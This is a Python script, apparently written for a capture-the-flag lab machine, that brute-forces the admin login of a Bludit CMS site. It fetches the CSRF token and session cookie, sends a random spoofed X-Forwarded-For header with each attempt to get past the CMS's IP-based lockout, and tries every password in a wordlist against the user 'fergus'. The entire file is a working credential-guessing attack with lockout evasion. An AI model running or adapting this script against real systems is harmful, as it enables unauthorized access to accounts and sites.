import requests
import re
import random

HOST = '10.10.10.191'
USER = 'fergus'
PROXY = {'http':'http://127.0.0.1:8080'}

def initialize_session():
    # return csrf token + session cookie
    r = requests.get(f'http://{HOST}/admin/')
    csrf = re.search(r'<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-f0-9]*)"', r.text)
    csrf = csrf.group(1)
    cookie = r.cookies.get('BLUDIT-KEY')
    
    return csrf, cookie

def do_login(user, password):
    csrf,cookie = initialize_session()
    data = {
        'tokenCSRF': csrf,
        'username': user,
        'password': password,
        'save':''}
    cookies = {
        'BLUDIT-KEY':cookie
    }
    headers = {
        'X-FORWARDED-FOR': f'{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}'
    }
    r = requests.post(f'http://{HOST}/admin/login', data=data, proxies=PROXY, cookies=cookies, allow_redirects=False, headers=headers)
    check_answer(r, user, password)


def check_answer(requestFILE, USERNAME, PASSWORD):
    if requestFILE.status_code == 200:
        if "Username or password incorrect" in requestFILE.text:
            print("WRONG PASSWORD!")
            return False
        elif "has been blocked" in requestFILE.text:
            print("BLOCKED BY IP")
            return False
    elif requestFILE.status_code == 301:
        print("USERNAME AND PASSWORD FOUND!")
        print(f"{USERNAME}:{PASSWORD}")
        return True
        

wordlist = open('potenPASS.txt').readlines()
for line in wordlist:
    line = line.strip()

    do_login('fergus', line)